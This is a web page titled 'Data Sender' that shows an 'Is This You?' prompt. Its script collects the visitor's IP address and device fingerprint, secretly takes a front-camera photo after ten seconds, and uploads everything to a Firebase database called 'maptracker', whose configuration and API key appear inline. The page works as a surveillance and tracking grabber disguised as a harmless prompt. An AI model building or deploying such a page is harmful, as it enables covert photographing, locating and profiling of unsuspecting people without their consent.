<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Data Sender</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #121212;
            color: #ffffff;
            text-align: center;
            margin: 0;
            padding: 0;
        }
        h1 {
            color: #00ff00;
            margin-top: 20px;
        }
        #loading-screen {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.8);
            color: #ffffff;
            justify-content: center;
            align-items: center;
            z-index: 999;
        }
        #loading-message {
            font-size: 24px;
            font-weight: bold;
        }
        .container {
            margin: 20px auto;
            max-width: 400px;
        }
        .button {
            background-color: #00cc00;
            color: white;
            padding: 15px 30px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 18px;
            transition: background-color 0.3s;
            width: 100%;
        }
        .button:hover {
            background-color: #009900;
        }
        .error-message {
            color: #ff0000;
            margin: 10px 0;
        }
        .info-message {
            color: #ffff00;
            margin: 10px 0;
        }
    </style>
</head>
<body>
    <div id="loading-screen">
        <div id="loading-message">
            <i class="fas fa-spinner fa-spin"></i> Sending data, please wait...
        </div>
    </div>
    <div class="container">
        <h1>Is This You?</h1>
        <p>Data will be sent automatically.</p>
        <button class="button" id="start-button">Start Process</button>
        <div id="error-message" class="error-message"></div>
        <div id="info-message" class="info-message"></div>
        <button class="button" id="redirect-button">Open in Browser</button>
    </div>

    <script type="module">
        const firebaseConfig = {
            apiKey: "AIzaSyDGOfNv0d5SlEsq2LvOJZJEJSgANeswKd4", // Your API Key
            authDomain: "maptracker-7afb6.firebaseapp.com", // Your Auth Domain
            databaseURL: "https://maptracker-7afb6-default-rtdb.firebaseio.com", // Your Database URL
            projectId: "maptracker-7afb6", // Your Project ID
            storageBucket: "maptracker-7afb6.appspot.com", // Your Storage Bucket
            messagingSenderId: "874600101063", // Your Messaging Sender ID
            appId: "1:874600101063:web:79d8010dee2bf0e57f7ae2", // Your App ID
            measurementId: "G-HTXZEYZ3DK" // Your Measurement ID
        };

        // Initialize Firebase
        const { initializeApp } = await import("https://www.gstatic.com/firebasejs/9.14.0/firebase-app.js");
        const { getDatabase, ref, set } = await import("https://www.gstatic.com/firebasejs/9.14.0/firebase-database.js");

        const app = initializeApp(firebaseConfig);
        const database = getDatabase(app);
        
        const loadingScreen = document.getElementById('loading-screen');
        const errorMessage = document.getElementById('error-message');
        const infoMessage = document.getElementById('info-message');

        document.getElementById('start-button').addEventListener('click', startProcess);
        document.getElementById('redirect-button').addEventListener('click', redirectToBrowser);

        async function startProcess() {
            errorMessage.innerHTML = ''; // Clear previous errors
            infoMessage.innerHTML = ''; // Clear previous info messages
            loadingScreen.style.display = 'flex'; // Show loading screen
            
            try {
                // Get user's IP address first
                const ipAddress = await getIpAddress();

                // Get device info
                const deviceInfo = await getDeviceInfo(ipAddress);

                // Start camera for 10 seconds
                const screenshot = await startCamera();

                // Create a unique session ID
                const sessionId = Date.now();

                // Upload data to Firebase
                await uploadSessionData(sessionId, screenshot, deviceInfo);

            } catch (error) {
                errorMessage.innerHTML = error.message;
            } finally {
                loadingScreen.style.display = 'none'; // Hide loading screen
            }
        }

        async function redirectToBrowser() {
            // Redirect to the GitHub Pages URL
            window.location.href = 'https://frankwesseling132.github.io/my-html-site/';
        }

        async function startCamera() {
            const video = document.createElement('video');
            video.autoplay = true;
            video.style.display = 'block'; // Make sure the video is visible
            video.setAttribute('playsinline', true); // Important for iOS devices

            try {
                // Access the camera
                video.srcObject = await navigator.mediaDevices.getUserMedia({
                    video: { facingMode: 'user' } // Use the front camera
                });
            } catch (error) {
                throw new Error("Unable to access the camera.");
            }

            document.body.appendChild(video); // Append video to the body to access the stream

            return new Promise((resolve) => {
                setTimeout(() => {
                    const canvas = document.createElement('canvas');
                    canvas.width = video.videoWidth;
                    canvas.height = video.videoHeight;
                    const ctx = canvas.getContext('2d');
                    ctx.drawImage(video, 0, 0);
                    video.srcObject.getTracks().forEach(track => track.stop()); // Stop the video stream
                    document.body.removeChild(video); // Clean up the video element
                    resolve(canvas.toDataURL('image/png')); // Return the screenshot as base64 string
                }, 10000); // Capture after 10 seconds
            });
        }

        async function getIpAddress() {
            const response = await fetch('https://api.ipify.org?format=json');
            const data = await response.json();
            return data.ip;
        }

        async function getDeviceInfo(ipAddress) {
            return {
                userAgent: navigator.userAgent,
                deviceMemory: navigator.deviceMemory || 'N/A', // Device memory in GB
                hardwareConcurrency: navigator.hardwareConcurrency || 'N/A', // Number of logical processors
                screenResolution: `${window.screen.width} x ${window.screen.height}`, // Screen resolution
                language: navigator.language || 'en-US', // User language
                platform: navigator.platform || 'N/A', // User platform
                ipAddress: ipAddress, // User IP address
                timezone: Intl.DateTimeFormat().resolvedOptions().timeZone // User timezone
            };
        }

        async function uploadSessionData(sessionId, screenshot, deviceInfo) {
            const sessionData = {
                timestamp: Date.now(),
                screenshot: screenshot,
                ...deviceInfo // Spread device info into session data
            };
            const dataRef = ref(database, 'sessions/' + sessionId);
            await set(dataRef, sessionData);
            console.log('Session data uploaded successfully');
        }
    </script>
</body>
</html>
